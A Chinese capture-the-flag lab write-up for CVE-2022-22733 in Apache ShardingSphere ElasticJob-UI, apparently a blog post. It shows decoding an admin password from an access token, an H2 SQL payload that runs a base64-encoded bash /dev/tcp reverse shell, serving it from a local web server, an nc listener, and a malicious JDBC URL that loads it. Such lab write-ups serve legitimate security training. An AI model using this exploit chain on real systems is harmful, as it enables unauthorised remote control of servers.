【春秋云境】CVE-2022-22733靶场WP

【春秋云境】CVE-2022-22733靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。
2.开启靶场

请添加图片描述

3.使用burpsuite抓包
  • 输入账号密码guest:guest,使用BP抓包会返回access Token

    请添加图片描述

4.解密获得root密码
  • 将返回的Token进行Base64解码,得到用户名密码均为root

    请添加图片描述

5.构造恶意代码
  • 构造恶意代码

    CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNDguOTYuMTAwLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}')
    

    其中只需要修改YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNDguOTYuMTAwLzEyMzQgMD4mMQ==,这段命令为bash -i >& /dev/tcp/ip/port 0>&1的base64编码

6.上传恶意文件
  • 将恶意代码保存为glc.sql,并在本地开启一个web服务,根据自己的python版本决定

    python2 -m SimpleHTTPServer 9999
    或者
    python3 -m http.server 9999
    

    请添加图片描述

7.开启监听端口
  • 在本地开机监听

    nc -lnvp 1234
    

    请添加图片描述

8.反弹shell
  • 使用root:root登录页面,点击Event trace data source—>ADD,url处填写jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://ip:port/glc.sql',其余信息随便填,然后点击Confirm,成功反弹shell

    请添加图片描述

  • 执行命令获得flag

    请添加图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值